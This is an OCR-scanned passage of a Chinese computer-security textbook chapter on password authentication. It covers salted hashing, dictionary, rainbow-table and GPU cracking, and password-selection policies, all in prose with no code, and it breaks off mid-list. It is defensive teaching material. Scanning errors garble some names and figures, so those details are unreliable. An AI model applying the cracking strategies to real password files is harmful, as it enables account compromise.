态 时 采用 自动 注销 的 机 制 ， 同 时 也 可 以 使 用 人 侵 检 测 方案 对 用 户 行为 的 变化 进行 检测 。 
HARAR (exploiting user mistake); 如 果 是 由 系统 分 配 口令 ， 那 么 用 户 通常 会 把 分 
配 的 口令 记录 下 来 ， 因 为 它 很 难 记忆 。 这 种 情况 使 得 攻击 者 有 机 会 读 到 记录 下 来 的 口 
令 。 例 如 ， 用 户 可 能 会 为 了 共享 文件 而 把 口令 告诉 自己 的 同事 。 此 外 ， 通 过 社会 工程 
学 策略 来 欺骗 用 户 或 账户 管理 者 使 其 泄露 口令 ， 使 用 这 种 方法 攻击 者 常常 能 够 成 功 获 
得 口令 。 很 多 计算 机 系统 给 系统 管理 员 预 设 口令 ， 除 非 这 种 预 设 口令 被 改变 ， 否 则 这 
些 口 令 将 会 很 容易 被 猜 到 。 对 应 的 解决 方法 包括 用 户 培训 、 入 侵 检 测 、 使 用 口令 与 其 
他 认证 机 制 的 组 合 认证 等 。 

口令 重复 利用 (exploiting multiple password use): 如果 一 个 指定 用 户 对 不 同 的 网 络 设备 
使 用 相同 或 相近 的 口令 ， 那 么 攻击 就 会 变 得 效率 很 高 ， 破 坏 性 很 强 。 对 应 的 解决 方法 
是 禁止 为 特定 的 网 络 设 备 设置 相同 或 相近 的 口令 。 

电子 监视 (electronic monitoring): 如 果 用 户 需 要 通过 网 络 来 登录 远程 的 系统 ， 那 么 就 
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有 被 窃听 的 危险 。 简 单 的 加 密 并 不 能 解决 此 类 问题 ， 因 为 加 密 的 口令 本 质 上 还 是 口令 ， 
可 能 会 被 攻击 者 观测 到 并 再 次 使 用 。 

无 论 口令 存在 多 少 安全 方面 的 脆弱 性 ， 它 依然 是 最 通用 的 用 户 认证 技术 ， 且 这 种 现状 在 将 
来 也 不 易 改 变 [HERL12]。 口令 仍 将 继续 流行 下 去 的 原因 如 以 下 几 条 : 

1. 指纹 扫描 和 智能 卡 读 取 等 技术 依赖 于 客户 端 硬件 ， 需 要 在 客户 端 和 服务 器 系统 上 均 实现 
相应 的 用 户 认 证 软件 。 对 于 客户 端 和 服务 器 系统 而 言 ， 在 其 中 一 端 被 广泛 接受 之 前 ， 另 一 端的 
实现 必然 受到 阻碍 ， 因 而 会 陷 人 一 个 “ 谁 先行 ”的 僵局 。 

2. 智能 卡 等 物理 令 牌 价格 昂贵 且 不 便携 ， 尤 其 当 需 要 使 用 多 个 令 牌 时 。 

3. 使 用 本 章 中 提 及 的 无 口令 技术 实现 基于 单一 登录 多 服务 的 方案 ， 会 产生 单一 的 安全 风险 。 

4. 自动 口令 管理 程序 用 于 缓解 用 户 记忆 和 输入 密码 的 负担 ， 而 它 对 多 客户 平台 间 的 漫游 和 
同步 的 支持 不 足 ， 其 用 途 尚 待 被 充分 开发 。 

因此 , 口令 在 用 户 认证 方面 值得 我 们 继续 深入 研究 。 


3.2.2 ”和 散 列 口令 的 使 用 


口令 安全 技术 广泛 使 用 了 散 列 函数 和 “ 盐 值 ” 。 这 种 策略 实际 上 在 所 有 UNIX 变 体 及 其 他 
操作 系统 上 都 在 使 用 ， 如 图 3-2a 所 表示 的 过 程 。 为 了 加 载 系 统 设置 的 一 个 新 口令 ， 用 户 需 要 
选择 或 被 分 配 一 个 口令 。 这 个 口令 与 一 个 固定 长 度 的 “HH (salt value)” 组 合 起 来 [MORR79]。 
在 较 早 期 的 实现 中 ,“ 盐 值 ”和 分 配 用 户口 令 的 时 间 相 关 。 在 较 新 一 些 的 实现 中 ， 则 使 用 了 伪 
随机 数 或 者 随机 数 。 口 令 和 “ 盐 值 ”将 作为 散 列 算法 的 输入 数据 ， 最 终 将 生成 一 个 定 长 的 散 列 
码 。 散 列 算法 的 设计 就 是 为 了 通过 减 慢 执行 而 阻止 攻击 的 发 生 。 散 列 编码 后 的 口令 将 和 SEE’ 
的 明文 拷贝 一 起 保存 在 相应 用 户 的 口令 文件 中 。 这 种 散 列 口令 的 方法 被 用 来 对 抗 多 种 密码 分 析 
攻击 方法 [WAGN00]， 以 保证 系统 安全 。 

当 用 户 试图 登录 到 一 个 UNIX 系统 时 ， 用 户 将 提供 ID 和 口令 ， 如 图 3-2b 所 示 。 操 作 系统 
用 ID 检索 口令 文件 ， 来 获得 “ 盐 值 ”的 明文 数据 以 及 经 过 加 密 的 口令 。“ 盐 值 ”和 用 户 提供 的 
口令 将 被 作为 输入 数据 进行 加 密 运 算 。 如 果 得 出 的 结果 和 口令 文件 中 存放 的 加 密 口 令 相 匹配 ， 
那么 用 户 提供 的 口令 就 会 被 系统 接受 。 





a) 加 载 新 口令 


图 3-2 UNIX 口令 方案 


使 用 “ 盐 值 ”的 三 个 目的 是 : 
e 它 可 以 防止 复制 的 口令 在 口令 文件 中 可 见 。 即 使 是 两 个 不 同 的 用 户 选 择 了 相同 的 口令 ， 
这 些 口 令 也 会 被 分 配 不 同 的 “ 盐 值 ”。 因 此 ， 这 两 个 用 户 所 拥有 的 散 列 口令 是 不 同 的 。 
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e 它 显著 地 增加 了 离线 口令 字典 攻击 的 难度 。 对 于 一 个 b 位 长 度 的 “ 盐 值 "， 可 能 产生 的 

口令 数量 将 会 增长 2 倍 ， 这 将 大 大 增加 通过 字典 攻击 来 猜测 口令 的 难度 。 

e 它 使 得 攻击 者 几乎 不 可 能 发 现 一 个 用 户 是 否 在 两 个 或 更 多 的 系统 中 使 用 了 相同 的 口令 。 

为 了 说 明 第 二 点 ， 考 虑 离线 字典 攻击 的 攻击 方式 。 攻 击 者 获得 一 份 口令 文件 的 拷贝 BE 
不 使 用 “ 盐 值 "， 那 么 攻击 者 的 目标 仅仅 是 猜测 口令 。 为 了 猜测 口令 ， 攻 击 者 只 需要 提交 大 量 
的 可 能 的 口令 给 散 列 函数 ， 如 果 这 些 猜测 口令 中 有 一 个 是 与 文件 中 的 散 列 口令 匹配 的 ， 那么 攻 
击 者 就 找到 了 口令 文件 中 的 一 个 口令 。 但 是 对 于 UNIX 操作 系统 机 制 ， 攻 击 者 除了 必须 要 提供 
一 个 猜测 的 口令 进行 散 列 运算 外 ， 还 要 考虑 字典 文件 中 每 一 个 “ 盐 值 "， 这 就 使 得 需要 检查 的 
猜测 的 次 数 大 大 增加 。 

对 于 UNIX 操作 系统 口令 方案 ,仍然 有 两 种 威胁 存在 。 首 先 ， 在 某 台 机 器 上 用 户 可 以 通过 
guest 账户 或 其 他 方法 获得 系统 的 访问 权 ， 然 后 运行 口令 猜测 程序 ， 该 程序 称 为 口令 破解 器 。 
在 消耗 很 少 的 资源 的 情况 下 ， 攻 击 者 就 能 够 检查 成 千 上 万 个 可 能 的 口令 。 其 次 ， 如 果 攻 击 者 能 
够 得 到 一 份 口令 文件 的 拷贝 ， 那 么 这 个 攻击 者 也 可 能 会 在 另 一 台 计 算 机 上 运行 口令 破解 程序 。 
这 使 得 攻击 者 可 以 在 合理 的 时 间 内 完成 上 百 万 次 的 口令 猜测 。 

UNIX 实现 Á UNIX 的 最 初版 本 起 ， 大 多 数 实现 都 依赖 于 以 下 的 口令 策略 : 每 个 用 户 
选择 一 个 长 度 至 多 为 八 个 可 打印 字符 的 口令 。 该 口令 将 被 转化 为 一 个 56 位 的 数值 (使 用 7 位 
ASCI 码 )， 作 为 加 密 例 程 的 输入 密 钥 。 这 个 散 列 例 程 就 是 crypt(3)， 基 于 DES 算法 ， 且 使 用 
12 位 的 “ 盐 值 ” 。 这 种 经 过 修改 的 DES 算法 要 求 输入 一 个 64 位 全 0 数据 块 ， 算 法 的 输出 作为 
下 一 次 加 密 的 输入 。 整 个 加 密 过 程 共 重 复 25 次 ， 最 后 得 出 的 64 位 输出 结果 被 转化 成 由 11 个 
字符 组 成 的 字符 序列 。 改 进 的 DES 算法 会 把 它 转化 为 一 个 单 向 的 散 列 函数 。crypt(3) 例 程 被 设 
计 用 来 防止 口令 猜测 攻击 。DES 加 密 算法 的 软件 实现 比 硬件 实现 要 慢 ， 经 过 25 轮 迭 代 所 消耗 
的 时 间 是 完成 一 次 口令 运算 的 25 倍 。 

这 种 加 密实 现 现在 被 认为 是 不 适用 的 。 例 如 ，[PERR03] 报告 了 利用 超级 计算 机 进行 字典 
攻击 的 结果 。 攻 击 者 可 以 在 80 分 钟 内 完成 五 千 万 次 口令 猜测 。 此 外 ， 该 结果 还 显示 ， 如 果 有 
人 能 用 单 处 理 器 计算 机 在 几 个 月 之 内 完成 相同 的 工作 ， 将 会 被 奖励 一 万 美元 。 尽 管 存在 明显 的 
弱点 ， 但 这 种 UNIX 口令 方案 仍然 有 存在 的 必要 ， 以 便 兼 容 已 有 的 财务 管理 软件 或 者 在 多 厂商 
的 环境 下 使 用 。 

还 有 其 他 更 强大 的 散 列 /“ 盐 值 ”方案 适用 于 UNIX 操作 系统 。 这 里 推荐 一 种 基于 MDS 的 
散 列 函数 (类 似 于 SHA-1， 但 安全 性 较 SHA-1 要 弱 )， 它 适用 于 很 多 UNIX 系统 ， 包 括 Linux, 
Solaris 和 FreeBSD 等 。 这 种 MDS 加 密 方案 使 用 一 个 48 位 的 随机 值 ， 并 对 口令 长 度 没 有 限制 。 
它 可 以 产生 一 个 128 位 的 散 列 值 ， 这 种 方法 比 crypt(3) 要 慢 得 多 。 为 了 实现 减速 ，MD5 加 密 技 
术 使 用 具有 1000 次 迭代 的 内 部 循环 。 

最 安全 的 UNIX 散 列 /“ 盐 值 ”方案 可 能 是 为 另 一 种 广泛 使 用 的 开源 UNIX— OpenBSD 
开发 的 方案 。[PROV99] 报告 显示 ， 这 种 方案 使 用 了 基于 Blowfish 对 称 分 组 密码 的 散 列 函 数 。 
该 散 列 函 数 被 称 为 Becrypt， 其 实现 起 来 速度 更 慢 。Bcrypt 运行 设置 的 口令 长 度 最 多 55 个 字符 ， 
并 要 求 使 用 一 个 128 位 的 随机 “ 盐 值 ” 来 产生 一 个 192 位 的 散 列 值 。Berypt 还 包括 一 个 代价 变 
量 ， 代 价 变量 的 增加 会 导致 执行 Berypt 散 列 运算 花费 的 时 间 增 加 。 在 设置 一 个 新 口令 时 ， 也 
要 指派 一 个 代价 变量 ， 所 以 系统 管理 员 可 以 为 特权 用 户 分 配 一 个 较 高 的 代价 变量 。 


3.2.3 破解“ 用户 选择 ”口令 


传统 方法 ”传统 的 口令 猜测 或 者 口令 破解 方法 ， 就 是 开发 一 个 庞大 的 口令 字典 并 使 用 其 
中 的 每 个 口令 对 口令 文件 进行 尝试 。 这 种 方法 通过 对 口令 文件 中 每 一 个 口令 使 用 “ 盐 值 ”来 进 
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行 散 列 运算 ， 并 和 口令 文件 中 存储 的 散 列 值 进行 比较 。 如 果 没 有 发 现 相 匹配 的 口令 ， 那 么 破解 
程序 将 会 尝试 去 改变 口令 字典 中 相似 的 口令 。 对 口令 字典 做 的 变换 包括 倒置 拼写 ， 添 加 特殊 字 
符 、 字 符 串 或 数字 等 。 

另外 一 种 口令 破解 的 手段 是 预计 算 潜 在 的 散 列 值 ， 以 空间 代价 来 换取 时 间 代 价 。 在 这 种 
方法 中 ,攻击 者 会 产生 出 一 个 包括 所 有 可 能 口令 的 较 大 的 口令 字典 。 对 于 口令 字典 中 的 每 个 
口令 ， 攻 击 者 都 要 根据 可 能 的 “ 盐 值 ”进行 散 列 运 算 。 产 生 的 结果 是 一 个 巨大 的 散 列 值 表 ， 
被 称 为 彩虹 表 (rainbow table)。 例 如 ，[OECH03] 显示 了 使 用 1.4GB 的 数据 能 够 在 13.8 秒 内 
破解 99.9% 的 完全 由 字母 和 数字 组 成 的 Windows 口令 的 散 列 值 。 针 对 这 种 攻击 方法 ， 可 以 
通过 设置 足够 大 的 “ 盐 值 ”以 及 设置 较 长 的 散 列 值 来 进行 对 抗 。 在 不 久 的 将 来 ，FreeBSD 和 
OpenBSD 系统 都 应 该 能 够 克服 这 种 攻击 带 来 的 安全 威胁 。 

为 了 应 对 足够 大 的 “ 盐 值 ”和 散 列 长 度 ， 攻 击 者 发 现 了 这 样 的 事实 : 某 些 用 户 设置 了 简单 
而 容易 猜测 的 口令 。 当 系统 允许 用 户 自行 设置 口令 时 ， 某 些 用 户 总 是 会 选择 一 个 过 于 简短 的 口 
令 。 普 度 大 学 (Purdue University) 进行 了 一 项 研究 [SPAF92a]， 这 项 研究 对 使 用 54 台 计 算 机 
的 7000 个 用 户 进行 了 调查 。 大 约 3% 的 用 户 使 用 的 口令 不 超过 3 个 字符 的 长 度 。 攻 击 者 可 以 
选择 3 或 者 更 小 的 数值 作为 口令 长 度 的 初始 值 进行 口令 破解 。 一 个 简单 的 补救 策略 就 是 让 系统 
拒绝 接受 所 有 小 于 规定 长 度 如 6 个 字符 的 口令 选择 ， 甚 至 要 求 所 有 的 口令 必须 设置 为 8 个 字符 
长 度 。 大 多 数 用 户 不 会 因为 此 项 限制 而 抱怨 。 

口令 的 长 度 只 是 一 个 方面 。 当 系统 允许 用 户 设 置 口令 时 ， 很 多 人 可 能 会 选择 一 个 容易 被 
猜测 的 口令 ， 比 如 用 户 名 字 、 街 道 名 字 、 字 典 中 的 常用 词汇 等 。 这 使 得 口令 的 破解 更 加 简单 直 
接 ， 破 解 者 只 需要 尝试 这 些 可 能 的 字符 串 就 可 以 完成 破解 。 由 于 很 多 人 都 使 用 这 种 容易 猜测 到 
的 口令 ， 使 得 这 种 策略 在 所 有 的 实际 系统 上 都 可 以 成 功 。 

[KLEI90] 的 一 份 报告 显示 了 这 种 猜测 攻击 的 有 效 性 。 研 究 者 从 很 多 种 数据 源 中 收集 了 
UNIX 口令 文件 ， 其 中 包括 近 14 000 个 经 过 加 密 的 口令 。 表 3-2 给 出 了 研究 的 结果 ， 对 于 这 份 
结果 ， 研 究 者 认为 其 很 惊人 。 在 所 有 的 口令 中 ， 接 近 四 分 之 一 的 口令 是 可 以 被 成 功 猜测 出 来 
的 。 下 面 列 出 了 口令 破解 所 使 用 的 策略 : 

1. 尝试 用 户 的 名 字 、 姓 名 缩写 、 账 户 名 以 及 其 他 的 个 人 相关 信息 。 对 于 每 一 个 用 户 总 共有 
130 种 不 同 的 组 合用 于 破解 尝试 。 

2. 尝试 使 用 不 同 字 典 中 出 现 的 词汇 。 研 究 者 编辑 了 一 本 超过 60 000 个 词汇 的 字典 ， 包 括 
系统 自 带 的 在 线 字典 以 及 其 他 一 些 词汇 列表 。 

3. 根据 对 第 2 步 中 的 词汇 进行 排列 来 尝试 破解 ， 包 括 把 词汇 的 第 一 个 字母 大 写 或 添加 控制 
符 ， 把 所 有 的 字符 都 大 写 ， 反 写 单词 ， 把 字母 “o” 变 成 数字 “0”， 等 等 。 这 些 排 列 将 为 口令 
词汇 列表 新 增加 100 万 个 词汇 。 

4. 对 来 自 第 2 FAA 3 步 中 未 予 考 虑 的 词汇 尝试 各 种 大 写 置 换 。 这 样 将 为 口令 词汇 列表 
增加 大 约 200 万 个 词汇 。 

这 样 ， 大 约 要 对 近 300 万 个 词汇 进行 测试 。 使 用 最 快速 的 处 理 器 ， 通 过 所 有 可 能 的 “ 盐 
值 ” 来 加 密 所 有 的 这 些 词汇 ， 时 间 不 会 超过 一 个 小 时 。 要 注意 ， 虽 然 这 样 的 枚 举 搜索 可 能 只 会 
有 25% 的 成 功率 ， 但 是 很 可 能 只 要 猜 中 一 个 口令 就 会 得 到 系统 的 足够 大 的 权限 。 

蛮 力 破解 和 字典 技术 结合 使 用 的 攻击 方法 已 被 广泛 认可 。 开 源 口 令 破解 器 John the 
Ripper[OPEN13] 是 一 个 值得 注意 的 例子 ， 它 开发 于 1996 年 并 沿用 至 今 。 

现代 方法 ”可惜 , 口令 的 脆弱 性 在 过 去 的 25 年 里 并 未 发 人 深 省 。 鉴 于 复杂 口令 策略 ， 相 
比 之 前 ， 用 户 在 设置 密码 方面 做 得 很 好 ， 同 时 组 织 在 提醒 用 户 方面 也 做 得 很 好 。 尽 管 如 此 ， 
口令 破解 技术 也 在 与 时 俱 进 。 破 解 技术 的 革新 主要 在 两 个 方面 。 首 先 ， 用 于 口令 破解 技术 的 处 
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理性 能 有 了 显著 的 提高 。 如 今 ， 随 着 计算 速度 的 提升 ， 在 同样 价格 的 PC 上 ， 图 形 处 理 器 执行 
口令 破解 程序 的 速度 比 十 年 前 单 核 处 理 器 快 了 近 千 倍 。 举 例 来 说 ， 利 用 [GOOD12a] 中 的 算法 ， 
一 台 搭载 单个 AMD Radeon HD7970 GPU 的 PC 能 够 平均 每 秒 尝试 8.2X 10? 种 口令 组 合 。 仅 仅 
在 十 年 前 ， 想 实现 如 此 的 运算 速度 只 能 使 用 昂贵 的 超级 计算 机 。 

第 二 ， 近 年 来 出 现 了 更 多 被 用 于 生成 潜在 口令 的 成 熟 算法 。 例 如 ，[NARA05] 提出 了 一 个 
口令 生成 模型 ， 它 利用 自然 语言 中 字母 出 现 的 概率 。 研 究 者 使 用 自然 语言 处 理 中 的 标准 马尔 可 
夫 模 型 显著 地 减少 了 口令 空间 的 大 小 。 

然而 ， 通 过 分 析 实 际 应 用 中 的 口令 样本 ， 已 经 得 出 了 最 佳 的 结果 。 为 了 发 展 比 蛮 力 破解 和 
字典 攻击 更 高 效 的 技术 ， 研 究 者 和 黑客 深入 分 析 了 口令 的 构成 。 而 且 ， 分 析 人 士 需要 大 量 的 当 
前 应 用 中 的 真实 口令 。 第 一 个 重大 突破 出 现在 2009 年 之 后 ， 某 次 大 规模 的 SQL 注入 攻击 致使 
网 游 服务 器 RockYou.com 的 3200 万 个 用 户 登 录 口 令 明 文 被 泄露 [TIMM10]。 自 此 之 后 ， 被 泄 
露 的 数 以 万 计 的 口令 文件 得 以 被 分 析 人 士 利用 。 

通过 使 用 大 量 被 泄露 的 口令 作为 训练 数据 ，[WEIR09] 报告 了 关于 上 下 文 无 关 文法 概率 在 
口令 破解 中 的 进展 。 在 报告 所 提 及 的 方法 中 ， 猜 测 的 顺序 由 猜测 的 可 能 性 决定 ， 包 括 字符 类 结 
构 在 训练 集中 的 出 现 频率 ， 以 及 数字 和 符号 子 串 的 出 现 频率 。 在 口令 破解 中 ， 该 方法 已 被 证 实 
有 效 [KELL12, ZHAN10]。 

[MAZU13] 给 出 了 一 个 口令 分 析 结 果 报 告 ， 该 分 析 中 涉及 的 口令 为 某 研究 性 大 学 中 25 000 
名 学 生 所 使 用 ， 且 这 些 口令 均 由 复杂 口令 策略 产生 。 分 析 人 士 使 用 了 [WEIR09] 中 的 口令 破解 方 
法 ， 他 们 使 用 的 数据 集 包括 一 些 泄露 的 口令 文件 (例如 RockYou 文件 )。 图 3-3 总 结 了 论文 中 主 
要 的 分 析 结 果 。 图 表 显 示 了 被 破译 口令 的 百分比 与 猜测 总 数 的 函数 关系 。 正 如 我 们 看 到 的 ， 在 
仅仅 10° 次 猜测 后 ， 超 过 10% 的 口令 被 破译 。 而 经 过 10° 次 猜测 ， 几 乎 40% 的 口令 被 破译 。 





猜测 次 数 
图 3-3 一 定 次 数 猜测 后 被 猜 中 口令 的 百分比 


3.2.4 口令 文件 访问 控制 


一 种 阻止 口令 攻击 的 方法 就 是 拒绝 对 手 访问 口令 文件 。 如 果 文 件 的 散 列 口令 部 分 只 能 被 特 
权 用 户 访问 ,那么 对 手 就 不 能 够 读 取 口令 文件 ， 除 非 他 拥有 特权 用 户 的 口令 。 通 常 ， 散 列 后 的 
口令 保存 在 与 用 户 ID 分 离 的 单独 文件 中 ， 这 个 文件 叫 作 影子 口令 文件 (shadow password file), 
对 于 影子 口令 文件 ， 需 要 特别 注意 保护 ， 防 止 非 授权 访问 。 尽 管 对 口令 文件 的 保护 工作 已 经 做 
了 很 多 ， 但 是 仍然 有 以 下 不 足 : 

© 很 多 系统 ， 包 括 大 多 数 的 UNIX 系统 ， 都 有 被 人 侵 的 可 能 。 黑 客 可 以 利用 操作 系统 中 
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软件 的 漏洞 绕 过 操作 系统 的 访问 控制 来 获取 口令 文件 。 此 外 ,文件 系统 的 漏洞 以 及 数 
据 库 管 理 系统 的 漏洞 也 可 以 使 黑客 能 够 对 口令 文件 进行 访问 。 

© 某 些 偶然 事件 会 导致 口令 文件 可 读 ， 因 此 会 危及 所 有 账户 的 安全 。 

e 某 些 用 户 在 其 他 安全 保护 域 的 其 他 机 器 上 具有 账户 ， 并 且 使 用 相同 的 口令 。 因 此 ， 只 
要 其 中 一 个 系统 的 用 户口 令 被 读 取 ， 那么 其 他 系统 上 的 账户 的 安全 也 会 受到 威胁 。 

© 物理 安全 性 的 缺乏 可 能 会 给 黑客 提供 可 乘 之 机 。 有 时 人 们 会 将 口令 文件 备份 到 紧急 修 
复 磁 盘 或 存档 磁盘 ， 攻 击 者 访问 该 备份 就 能 读 取 口 令 文件 。 此 外 ， 用 户 可 以 从 运行 另 
一 个 操作 系统 (如 Linux) 的 磁盘 启动 ， 来 访问 这 个 操作 系统 中 的 文件 。 

© 除了 获取 系统 口令 文件 之 外 ， 另 外 一 种 方法 就 是 对 网 络 通信 和 包 进 行 监听 来 收集 用 户 ID 


和 口令 。 
Auk, 口令 保护 策略 必须 要 补充 到 访问 控制 方法 中 ， 以 强制 用 户 选择 那些 不 容易 被 破解 的 口令 。 
3.2.5 “口令 选择 策略 


在 没有 限制 的 情况 下 ， 多 数 用 户 选 择 的 口令 不 是 太 短 就 是 太 容易 被 猜 到 。 在 另外 一 种 极端 
的 情况 下 ， 如 果 为 用 户 设置 由 8 个 随机 选择 的 字符 组 成 的 口令 ， 那 么 该 口令 可 以 说 是 很 难 被 破 
解 的 。 但 是 ， 这 可 能 导致 大 多 数 用 户 根本 记 不 住 他 们 所 设置 的 口令 。 幸 运 的 是 ， 即 使 我 们 限制 
口令 的 样本 的 总 体 是 那些 容易 记 住 的 字符 串 ， 但 是 庞大 的 口令 样本 也 会 使 口令 的 破解 变 得 不 可 
行 。 我 们 制定 口令 选择 策略 的 目标 ， 是 不 仅 要 使 口令 变 得 不 容易 破解 ， 而 且 要 允许 用 户 选择 容 
易 记 忆 的 口令 。 为 了 实现 这 个 目标 ， 目 前 正在 使 用 下 面 四 种 基本 方法 : 

e FAP AA (user education) 

© 计算 机 生成 口令 (computer-generated password) 

e 后 验 口令 检查 (reactive password checking) 

e 先 验 口令 检查 (proactive password checking ) 

应 该 告知 用 户 选 择 使 用 难以 被 破解 的 口令 的 重要 性 ， 同 时 应 该 给 用 户 提 供 一 些 具体 的 选择 
这 类 强 口令 的 指导 原则 。 这 种 用 户 教育 策略 在 很 多 时 候 是 无 效 的 ， 特 别 是 在 用 户 数 量 众多 或 者 
人 员 流 动 较 大 的 情况 下 ， 很 多 用 户 可 能 会 忽视 系统 给 出 的 提示 。 另 外 一 些 用 户 也 可 能 不 知道 如 
何 判断 一 个 口令 是 难 破解 的 。 例 如 ， 很 多 用 户 会 错误 地 认为 把 词汇 反 写 或 者 把 最 后 一 个 字母 大 
写 就 会 得 到 一 个 不 可 破解 的 口令 。 

尽管 如 此 ， 在 设置 口令 时 系统 给 用 户 以 指导 仍然 是 很 有 意义 的 。 可 能 最 好 的 方法 就 是 遵 
从 以 下 建议 : 使 用 一 个 短语 的 每 个 单词 的 首 字母 作为 口令 。 但 是 不 要 选择 像 “ an apple a day 
keeps the doctor away” ( Aaadktda) 一 类 众所周知 的 短语 。 相 反 ， 应 该 选择 此 类 短语 ， 如 “ My 
dog’s first name is Rex” (MdfniR) 或 者 “My sister Peg is 24 years old”( MsPi24yo) 。 研 究 表明 ， 
用 户 更 容易 记 住 此 类 口令 ， 而 攻击 者 却 不 容易 破解 此 类 口令 。 

使 用 计算 机 生成 口令 同样 存在 问题 。 如 果 计 算 机 生成 的 口令 是 非常 随机 的 ， 则 会 导致 用 户 
难于 记忆 。 即 使 这 些 口 令 是 可 以 拼 读 的 ， 但 用 户 记忆 口令 仍然 会 有 困难 ， 因 而 其 更 倾向 于 把 口 
令 写 下 来 。 总 的 来 说 ， 计 算 机 产生 口令 的 策略 是 不 容易 被 用 户 所 接受 的 。FIPS 181 定义 了 一 种 
设计 很 好 (best-designed) 的 口令 自动 生成 器 。 这 个 标准 不 仅 包括 了 设计 方法 的 描述 ， 而 且 给 
出 了 这 个 算法 的 完整 C 语言 源 代 码 。 这 个 算法 通过 形成 可 拼 读 的 音节 并 把 它们 连接 起 来 组 成 
单词 。 通 过 一 个 随机 数 生 成 器 生成 一 个 随机 的 字符 流 ， 并 以 此 来 构建 音节 和 单词 。 

后 验 口令 检查 策略 就 是 系统 周期 性 地 运行 自己 的 口令 破解 程序 来 找到 容易 被 猜测 到 的 口令 ， 
系统 将 会 取消 这 种 容易 被 破解 的 口令 ， 并 通知 相应 的 用 户 。 这 种 策略 仍然 存在 缺点 。 首 先 ， 由 于 
口令 破解 者 可 以 持续 几 个 小 时 甚至 几 天 使 用 他 的 全 部 CPU 资源 来 进行 口令 破解 。 然 而 ， 后 验 口令 
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检查 策略 的 资源 使 用 却 是 受 限 制 的 。 此 外 ， 一 个 容易 被 破解 的 口令 在 后 验 口令 检查 策略 发 现 它 
之 前 ， 将 一 直 处 于 容易 被 破解 的 状态 。 因 此 ， 如 果 有 用 户 设 置 了 容易 被 破解 的 口令 ， 那 么 在 后 
验 口令 检查 找到 它 之 前 可 能 就 已 经 被 攻击 者 破解 了 。 应 用 这 种 策略 一 个 较 好 的 例子 就 是 开源 软 
件 Jack the Ripper 口令 检查 器 (openwall.com/john/pro/)， 它 可 以 在 很 多 不 同 的 操作 系统 中 工作 。 

目前 ， 最 被 认可 的 一 种 提高 口令 安全 的 方法 ， 是 采用 先 验 口令 检查 的 策略 。 在 这 种 策略 
中 ， 人 允许 用 户 选择 他 自己 的 口令 ， 但 是 在 选择 过 程 中 系统 将 会 对 口令 进行 检查 ， 决 定 是 否 允 许 
用 户 设 置 该 口令 。 如 果 不 允许 设置 ， 则 拒绝 其 选择 此 口令 。 在 系统 的 充分 提示 下 ， 用 户 可 以 从 
大 量 的 口令 空间 中 选择 那些 不 容易 被 破解 而 且 容 易 记 忆 的 口令 ， 这 样 就 很 可 能 避 开 通过 口令 字 
典 进 行 的 口令 破解 的 攻击 。 

这 种 先 验 口令 检查 的 策略 需要 在 用 户 接受 程度 和 口令 的 设置 强度 上 做 出 平衡 。 如 果 系 统 拒绝 了 
过 多 用 户 设 置 的 口令 ， 那 么 用 户 将 会 抱怨 这 种 口令 策略 缺乏 用 户 的 选择 空间 。 如 果 系 统 使 用 了 较 简 
单 的 口令 选择 算法 ， 使 它 变 得 容易 被 用 户 接受 ， 那 么 口令 强度 将 会 受到 影响 ， 这 也 会 为 口令 攻击 
者 改进 其 猜测 技术 提供 帮助 。 在 随后 的 内 容 中 ， 我 们 将 针对 先 验 口令 检查 提供 一 些 可 行 的 方法 。 

规则 实施 ”第 一 种 方法 是 构造 一 个 实施 规则 的 简单 系统 ， 例 如 ， 执 行 以 下 的 规则 . 

e 所 有 的 口令 长 度 至 少 是 8 个 字符 。 

© 在 口令 最 开始 的 8 个 字符 中 必须 至 少 包 括 一 个 大 写字 母 、 一 个 小 写字 母 、 一 个 数字 以 

及 一 个 标点 符号 。 
这 些 规则 可 以 和 系统 提出 的 一 些 建 议 一 并 提交 给 用 户 。 尽 管 这 种 方法 优 于 简单 的 用 户 教育 
手段 ， 但 是 要 阻止 口令 破解 者 的 攻击 仍然 是 不 够 的 。 这 个 方案 也 提示 攻击 者 没 必 要 尝试 猜测 一 
些 口令 ， 但 他 们 仍然 可 以 进行 口令 的 破解 。 
实施 规则 可 以 在 先 验 口令 检查 过 程 中 自动 地 进行 。 例 如 ， 开 源 软件 pam_passwdqc (openwall. 
com/passwdqc/)， 它 在 进行 口令 设置 时 ， 执 行 各 种 规则 ， 并 可 以 由 系统 管理 员 进 行 配 置 。 
口令 破解 器 ” 另 一 个 可 行 的 方法 是 构造 一 个 由 不 能 作为 口令 选择 的 字符 串 组 成 的 “不 可 
行 ”口令 字典 。 当 用 户 在 选择 一 个 口令 时 ， 系 统 将 会 检查 这 个 口令 以 保证 其 不 出 现在 这 个 “不 
可 行 ”口令 字典 中 。 但 是 这 种 方法 有 两 个 缺点 : 
e 空间 消耗 : 这 个 字典 必须 构造 得 非常 大 以 保证 可 用 性 。 例 如 ， 普 度 大 学 的 研究 中 使 用 
的 “不 可 行 ” 口 令 字典 [SPAF92a] 占用 超过 30MB 的 存储 空间 。 

e 时 间 消 耗 : 对 如 此 庞大 的 字典 进行 搜索 可 能 需要 相当 长 的 时 间 。 此 外 ， 为 了 检查 字典 
词汇 的 可 能 变换 ， 要 么 将 这 些 词汇 包含 在 字典 中 ， 使 得 口令 字典 变 得 更 加 庞大 。 要 人 么 
每 一 次 搜索 都 会 花费 相当 长 的 处 理 时 间 。 

Bloom 过 滤器 ”Spafford 提出 了 一 个 基于 Bloom 过 滤器 ( Bloom filter) [BLOO70] 的 方法 
[SPAF92a，SPAF92b]， 用 于 生成 高 效 的 后 验 口令 检查 器 ， 而 检查 器 是 通过 拒绝 使 用 在 一 些 系 
统 (如 Linux) 上 使 用 的 口令 列表 中 的 口令 而 实现 的 。 在 开始 介绍 这 个 过 滤器 之 前 ， 我 们 将 首先 
解释 它 的 运行 原理 。 一 个 k 阶 的 Bloom 过 滤器 由 上 个 相互 独立 的 散 列 函数 (x), A(x), ,Bo 
组 成 ， 每 一 个 散 列 函数 将 口令 映射 为 一 个 范围 在 O~N—-1 之 间 的 散 列 值 。 即 

H,(X)=y 1<i<k; 1</<D; 0<y<N—1 
其 中 

e 罗 表 示 口 令 字典 中 的 第 j 个 词汇 ; 

e DD 表示 口令 字典 中 的 词汇 数量 。 

依据 以 下 操作 步骤 生成 口令 字典 : 

1. 定义 一 个 入 位 的 散 列表 ， 所 有 位 的 初始 值 都 设置 为 0。 

2. 对 于 每 一 个 口令 ,计算 它 的 k 个 散 列 值 ， 并 且 把 散 列表 中 对 应 的 位 置 设置 为 1。 因此 ， 
